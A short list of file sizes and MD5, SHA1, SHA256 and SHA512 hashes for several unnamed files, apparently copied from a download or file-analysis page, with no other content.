  SHA256: d7a6c436e81f9f88b1419b3a3a6f46903b57c460ac5bfea1454808e3588adb59
  SHA512: 673e52c840cc3c36987abee2be887bec5235d9dbfd1c11d464bdcbef98c028b1eb2c4075b4faab30f010520e2abe3db1d9ea97c1fb5ef58c19da4b89071f8d9c

- Filesize: 49KB
  MD5: 423f3a8f8289fda22055c3c6ddf3bdef
  SHA1: 23d160ca742e6124238fbf94c3be148737849ee3
  SHA256: bf6176ac2944b356b888d0a40d858ad4321cd1f73ea8cc50f1cae4594e303f25
  SHA512: 83c1b76b70c25e031aa1e30a6a34729d3165a2e8b1c350b240855e6962db3260de99ae8abb2a9b6a391123256d46f92d52268a70e34723dd4be6fe89455bd22f

- Filesize: 308B
  MD5: 2993b76e0b0ba015caf654881638a0c0
  SHA1: 7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
  SHA256: 0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
  SHA512: a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

- Filesize: 629KB
  MD5: d3e9f98155c0faab869ccc74fb5e8a1e
  SHA1: 8e4feaad1d43306fdd8aa66efa443bca7afde710
  SHA256: 3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
  SHA512: 2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

- Filesize: 457KB
  MD5: aff5c405f7a9f0b3e6e77da9ea517c01
  SHA1: 0a956bfd7d4fedeaba8fd50373aa1d2fe29e9f21
  SHA256: a784f9965c2d168311cbbc4e56cfb562d8f0d0adb6771c41931ebf0912b9a7cf
  SHA512: 90fd88c1dbe978c3c74400321f9639cd1263d0811b75df99178db4163ae0dfbc86dd8e2ef45b83f5d431ae83ea03cd435d00fd4922458c6e3d21d9e5be293c77